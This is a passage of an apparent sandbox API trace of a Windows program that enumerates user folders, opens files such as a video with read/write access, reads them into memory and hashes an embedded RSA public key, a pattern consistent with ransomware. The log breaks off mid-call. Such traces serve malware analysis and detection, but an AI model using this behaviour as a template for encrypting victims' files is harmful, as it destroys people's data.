(HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.990] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66b38ff0, ftCreationTime.dwHighDateTime=0x1d5e517, ftLastAccessTime.dwLowDateTime=0xc0ae7fa0, ftLastAccessTime.dwHighDateTime=0x1d5e5f4, ftLastWriteTime.dwLowDateTime=0xc0ae7fa0, ftLastWriteTime.dwHighDateTime=0x1d5e5f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dqq7i08G7zkmy4eWB", cAlternateFileName="_DQQ7I~1")) returned 0xffffffff [0232.991] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e2f0 [0232.991] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.991] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0232.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb468 [0232.991] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0232.991] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.991] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.991] PathFindFileNameW (pszPath="") returned="" [0232.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.991] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0232.992] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.992] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0232.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0232.992] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned=".ini" [0232.992] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0232.992] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0232.992] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5498 [0232.992] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.992] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0232.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb468 [0232.993] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0232.993] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.993] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.993] PathFindFileNameW (pszPath="") returned="" [0232.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e2f0 [0232.993] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0232.993] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.993] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0232.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0232.993] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned=".ini" [0232.993] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0232.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.993] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned=".search-ms" [0232.994] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.994] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0232.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0232.994] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned=".search-ms" [0232.994] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.994] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0232.994] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0232.995] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5498 [0232.995] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.995] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0232.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb468 [0232.995] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0232.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.995] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.995] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.995] PathFindFileNameW (pszPath="") returned="" [0232.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.995] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0232.995] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e2f0 [0232.996] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.996] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0232.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb468 [0232.996] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0232.996] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.996] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.996] PathFindFileNameW (pszPath="") returned="" [0232.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.996] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0232.996] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e2f0 [0232.996] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.997] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0232.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb468 [0232.997] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0232.997] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.997] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.997] PathFindFileNameW (pszPath="") returned="" [0232.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e560 [0232.997] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0232.997] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5498 [0232.997] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.997] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0232.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb468 [0232.998] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0232.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.998] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.998] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.998] PathFindFileNameW (pszPath="") returned="" [0232.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.998] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbf37e40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbf37e40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0232.998] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbf37e40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbf37e40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.998] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefb8d340, ftCreationTime.dwHighDateTime=0x1d5d9ab, ftLastAccessTime.dwLowDateTime=0x8fc56a20, ftLastAccessTime.dwHighDateTime=0x1d5dd66, ftLastWriteTime.dwLowDateTime=0x8fc56a20, ftLastWriteTime.dwHighDateTime=0x1d5dd66, nFileSizeHigh=0x0, nFileSizeLow=0x17b4d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8RYL8Xv3gwr89piN.flv", cAlternateFileName="8RYL8X~1.FLV")) returned 1 [0232.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.998] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8RYL8Xv3gwr89piN.flv") returned=".flv" [0232.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8RYL8Xv3gwr89piN.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8ryl8xv3gwr89pin.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.999] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=97101) returned 1 [0232.999] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.002] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x17b27, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.002] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.004] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.004] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x17b4d, lpOverlapped=0x0) returned 1 [0233.006] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.006] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.006] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.006] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.006] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0233.007] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.007] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.007] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.007] CryptGetHashParam (in: 